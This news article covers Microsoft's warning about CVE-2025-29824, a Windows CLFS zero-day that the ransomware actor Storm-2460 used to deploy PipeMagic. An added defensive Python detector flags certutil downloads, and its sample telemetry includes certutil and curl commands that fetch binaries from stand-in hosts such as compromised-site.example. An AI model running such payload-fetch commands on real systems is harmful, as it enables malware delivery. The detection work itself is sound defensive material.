Tech giant Microsoft has issued a warning that threat actors have been exploiting a zero-day vulnerability in a widely targeted Windows logging system. This flaw, found in the Common Log File System (CLFS), has been used by ransomware actors to launch attacks against organizations in various sectors.
According to Microsoft, the attackers have targeted a small number of organizations, including firms in the U.S. real estate sector, a Spanish software company, the financial sector in Venezuela, and the retail sector in Saudi Arabia. The Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability, tracked as CVE-2025-29824, to its Known Exploited Vulnerabilities Catalog; it carries a CVSS score of 7.8.
Microsoft tracks the ransomware actor exploiting this flaw as Storm-2460, which used it to deploy the PipeMagic malware. Microsoft has urged organizations to apply all available security updates for elevation-of-privilege flaws to defend against ransomware attacks, emphasizing that such updates deny threat actors the privilege escalation they need once they have gained an initial foothold on a compromised device.
In a blog post, Microsoft disclosed that they have not yet determined how Storm-2460 gained access to compromised devices. The group utilized the Windows certutil utility to download malware from a legitimate third-party site they had compromised previously. By deploying PipeMagic and executing the log system exploit directly in memory without writing files to disk, the attackers were able to evade detection.
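Because the article notes that Storm-2460 fetched its payload with the built-in certutil utility, the defender-side takeaway is to watch process-creation telemetry for certutil being invoked with a URL. The following is an added example, not Microsoft's detection logic or anything published with the advisory. It assumes a constructed, pipe-delimited stand-in for a process-creation event (timestamp, host, parent image, image, command line, such as a Sysmon Event ID 1 would carry) and flags only the download-style switches paired with an http(s) URL, so routine uses such as hashing a file are not reported.

```python
"""Flag process-creation events in which certutil.exe is used to fetch content
from a URL. Added example for this article, not Microsoft's detection rule.
Log format below is constructed: timestamp|host|parent_image|image|command_line."""
import re
from dataclasses import dataclass

# http(s) URL anywhere in the command line
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# certutil switches that pull content from a URL; both dash and slash forms
DOWNLOAD_SWITCHES = ("-urlcache", "/urlcache", "-verifyctl", "/verifyctl")
FIELDS = ("timestamp", "host", "parent_image", "image", "command_line")


@dataclass
class Finding:
    timestamp: str
    host: str
    parent_image: str
    url: str
    command_line: str


def parse_event(line):
    """Split one constructed log line into a dict, or return None if malformed."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def is_certutil_download(image, command_line):
    """True when the image is certutil.exe and the command line pairs a
    download switch with a URL. Case-insensitive, since Windows is."""
    if not image.lower().endswith("certutil.exe"):
        return False
    lowered = command_line.lower()
    has_switch = any(sw in lowered for sw in DOWNLOAD_SWITCHES)
    return has_switch and URL_RE.search(command_line) is not None


def detect_certutil_downloads(lines):
    """Run the check over an iterable of log lines and return the findings,
    keeping the parent image so an analyst can see what launched certutil."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue  # skip malformed telemetry rather than crash the job
        if is_certutil_download(event["image"], event["command_line"]):
            url = URL_RE.search(event["command_line"]).group(0)
            findings.append(Finding(event["timestamp"], event["host"],
                                    event["parent_image"], url,
                                    event["command_line"]))
    return findings


# Constructed sample telemetry: hosts, times, paths and URLs are all made up.
SAMPLE_EVENTS = [
    r"2025-04-08T10:01:02Z|WS01|C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil -hashfile installer.exe SHA256",
    r"2025-04-08T10:03:15Z|WS01|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f https://compromised-site.example/update.bin C:\Users\Public\update.bin",
    r"2025-04-08T10:04:00Z|WS02|C:\Windows\System32\cmd.exe|C:\Windows\System32\curl.exe|curl -o x.bin https://compromised-site.example/x.bin",
    r"2025-04-08T10:05:30Z|WS03|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\certutil.exe|CertUtil.exe /urlcache /f http://198.51.100.7/a.txt a.txt",
    "not a well-formed event line",
]

if __name__ == "__main__":
    for f in detect_certutil_downloads(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.host} parent={f.parent_image} url={f.url}")
```

The parent image is kept on purpose: certutil launched from a shell or script host under a user session is far more suspicious than the same binary run by a deployment tool, and that context is what turns a noisy LOLBin match into a triageable alert. In production the same logic belongs in the SIEM or EDR query language rather than a script, and the switch list should be tuned against a baseline of legitimate certutil use in the environment.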
To address the issue, Microsoft released security updates and noted that customers running Windows 11, version 24H2 are not affected by the exploitation observed so far, even though the vulnerable code is present on that version. Beyond that, the company has not provided further detail on how Storm-2460 initially infiltrated the compromised devices.
This incident highlights the ongoing threat posed by ransomware actors exploiting vulnerabilities in widely used systems. Organizations are advised to stay vigilant and apply necessary security updates to mitigate the risk of falling victim to such attacks. Microsoft’s efforts to address this issue demonstrate the importance of proactive security measures in safeguarding against cyber threats.